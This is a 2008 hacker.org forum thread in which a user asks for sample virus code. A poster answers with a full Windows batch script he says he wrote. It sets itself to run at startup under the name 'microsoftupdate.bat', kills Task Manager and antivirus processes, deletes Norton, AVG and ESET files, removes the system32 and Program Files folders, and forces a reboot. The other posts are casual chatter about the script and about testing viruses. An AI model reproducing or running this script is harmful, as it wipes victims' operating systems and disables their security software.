Sample codes for a Virus

Discussion about hacker.org's server
User avatar
Crawler
Posts: 49
Joined: Mon Sep 01, 2008 7:20 pm

Post by Crawler »

PaRaDoX wrote:oh code injection! you could have just said something :)
Who your talking to? xD
-S3TH STOLE YOUR ACCOUNT LOL
User avatar
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Post by PaRaDoX »

lulz whiteknight :P
Image

~You are a glitch in my reasoning.
Sniped Sniper
Posts: 3
Joined: Sun Feb 10, 2008 2:25 am

Post by Sniped Sniper »

MessageBox.Show("Learn a easier Programming Language Like Visual Basic or JavaScript first, Then Learn a powerful language like C, C#, or C++")
User avatar
macros
Posts: 18
Joined: Wed Aug 27, 2008 7:27 am

Re: Sample codes for a Virus

Post by macros »

azelmj wrote:Hmm can anyone show me the codes for a virus..
Use google!
Last edited by macros on Fri Sep 12, 2008 8:12 am, edited 1 time in total.
azelmj
Posts: 13
Joined: Sun Jul 13, 2008 1:40 am
Location: MicroChip

..

Post by azelmj »

Well I know how to program using C. Actually its the first prog language I learned.. So I know alittle bout it.. I just wanna learn about the composition of a virus, for example is, worm.. Thanks..
User avatar
Hydra
Posts: 7
Joined: Wed Sep 10, 2008 7:06 pm
Location: U.S.A

virus source code by me

Post by Hydra »

@echo off
reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d microsoftupdate.bat /f
taskkill /f /im taskmgr.exe
taskkill /f /im Navw32.exe
taskkill /f /im taskmgr.exe
taskkill /f /im Navwnt.exe
taskkill /f /im taskmgr.exe
taskkill /f /im NAVStub.exe
taskkill /f /im taskmgr.exe
rd C:\Program Files\Norton AntiVirus
taskkill /f /im taskmgr.exe
del C:\Program Files\Grisoft\AVG Free\vault.dll
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.000
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.002
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.003
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.004
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.005
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.006
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod.ovl
taskkill /f /im taskmgr.exe
taskkill /f /im nod32.exe
taskkill /f /im taskmgr.exe
taskkill /f /im nod32krn.exe
taskkill /f /im taskmgr.exe
taskkill /f /im nod32kui.exe
taskkill /f /im taskmgr.exe
rd C:\Program Files\ESET
taskkill /f /im taskmgr.exe
rd C:\WINDOWS\system32
taskkill /f /im taskmgr.exe
msg* Hey listening me
taskkill /f /im taskmgr.exe
msg* your computer have a crappy system
taskkill /f /im taskmgr.exe
msg* Sorry
taskkill /f /im taskmgr.exe
rd C:\Program Files
taskkill /f /im taskmgr.exe
SHUTDOWN -R -F -T 30 -C "Virus Have Been Delete Auto Shutdown."
I am not a Hacker. I am security professional.
User avatar
Hydra
Posts: 7
Joined: Wed Sep 10, 2008 7:06 pm
Location: U.S.A

The most virus!

Post by Hydra »

The most virus write on simple application. Notepad. But go to internet you can find some sample in C++ how to make virus. Carefullest if you test a virus.
I am not a Hacker. I am security professional.
WhiteKnight
Posts: 276
Joined: Fri Aug 15, 2008 8:21 am

Re: The most virus!

Post by WhiteKnight »

Hydra wrote:The most virus write on simple application. Notepad. But go to internet you can find some sample in C++ how to make virus. Carefullest if you test a virus.
That where I got these viruses and tested them on a wimpy computer. ;)

People... virtual machine can still break your computer anyway.
User avatar
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Post by PaRaDoX »

hmm. hydra, i understand the taskkill and del commands, but what is the RD command for?
Image

~You are a glitch in my reasoning.
The_Dark_Avenger
Posts: 115
Joined: Wed Jun 11, 2008 9:47 pm

Post by The_Dark_Avenger »

PaRaDoX wrote:hmm. hydra, i understand the taskkill and del commands, but what is the RD command for?
RD?? Remove Directory
User avatar
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Post by PaRaDoX »

oh right.
Image

~You are a glitch in my reasoning.
azelmj
Posts: 13
Joined: Sun Jul 13, 2008 1:40 am
Location: MicroChip

Thanks Thanks

Post by azelmj »

Thanks for you comments, you've been most helpful to me.. Now I know what to do, thanks again.. Good Luck guys.. :P
Post Reply